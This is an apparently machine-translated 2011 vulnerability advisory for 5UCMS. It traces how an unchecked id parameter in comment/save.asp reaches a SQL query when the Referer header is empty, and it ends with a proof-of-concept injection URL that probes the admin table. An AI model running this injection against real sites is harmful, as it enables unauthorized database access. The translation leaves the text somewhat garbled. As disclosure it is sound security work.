5 UCMS & amp; lt; = v1.2.2024 SQL Injection Analysis

Release date: 2011-03.10
Author: asmc

Affected Versions: 5 UCMS <= v1.2.2024
Http://www.5u.hk

Vulnerability Type: SQL Injection Vulnerability

Detailed description:
When I recently tested a website, I submitted/admin/, and the browser flashed "Carefree Network Management System". GOOGLE search downloaded the latest source code and found the following problems:

File .. pluscommentsave. asp

Row 23: Dim Comment_Aid, Comment_User, Comment_Content

Row 24: Comment_Aid = Request ("id ")

In addition, the submitted id value is inserted into the SQL statement as follows:

Row 55: Set Ns = DB ("Select [ID], [Cid], [Comments], [IsComment] From [{pre} Content] Where [ID] = "& Comment_Aid, 3)

The following pseudo-filter code is added between lines 24 and 55:

Row 44: if Len (Comment_Aid) = 0 Or Not IsNumeric (Comment_Aid) Then Call Alert (Plus. Lang ("iderr"), Gourl)

Row 45I: f Len (Comment_User) <2 Then Comment_User = "Guest"

Row 46: If Len (Comment_Content) <Plus. config ("contentmin") Then Call Alert (replace (Plus. lang ("contentmin"), "$1", Plus. config ("contentmin"), Gourl)

Row 44 requires that the id must have a value and a number. Otherwise, Alert () will be called. The search function is as follows:

File .. incfunction. asp

Row 3: function Alert (byval Msgstr, byval Url)

If len (Url)> 0 then

On error resume next

If Isobject (conn) then conn. close 'close the database link

If len (Msgstr)> 0 then response. write "<Script> alert ('" & Msgstr & "'); </Script>" 'prompt

Response. write "<Script> location. href = '" & Url & "; </Script>"' jump

Response. end

Else

If len (Msgstr)> 0 then response. write "<Script> alert ('" & Msgstr & "'); </Script>" 'prompt

End if

End function

This function contains a nested if structure. if the Url is empty, the code after else is executed:

If len (Msgstr)> 0 then response. write "<Script> alert ('" & Msgstr & "'); </Script>" 'prompt

This statement only prints the error message and does not execute response. end. Therefore, Alert () fails to check the id data type, which eventually leads to SQL injection.

So how does the key jump variable Url come from? Go back and check the save. asp file.

Row 9: Dim Gourl: Gourl = Request. ServerVariables ("HTTP_REFERER ")

This is the culprit. The following content is taken from the network:

"Request. ServerVariables (" HTTP_REFERER ") in asp can get the source address.
Values can be obtained in the following cases:
1. directly use <a href>
2. Form submitted with Submit or <input type = image> (POST or GET)
3. Form submitted using Jscript (POST or GET)
Values cannot be obtained in the following cases:
1. Link from favorites
2. Click 'homepage' or a custom address.
3. Use location. href or location. replace () of Jscript ()
4. Enter the address in the browser.
5. <% Response. Redirect %>
6. <% Response. AddHeader %> or <meta http-equiv = refresh> redirect
7. Load the address with XML"
In the first article that cannot be set, it indicates that the access path directly constructed makes the Gourl empty.

Proof of vulnerability:
Test: EXP
(Access Database) asp? User = test & content = aaaaaa & id = 1 "> http://www.bkjia.com/plus/comment/save.asp? User = test & content = aaaaaa & id = 1 and 0 <> (select count (*) from 5U_Admin)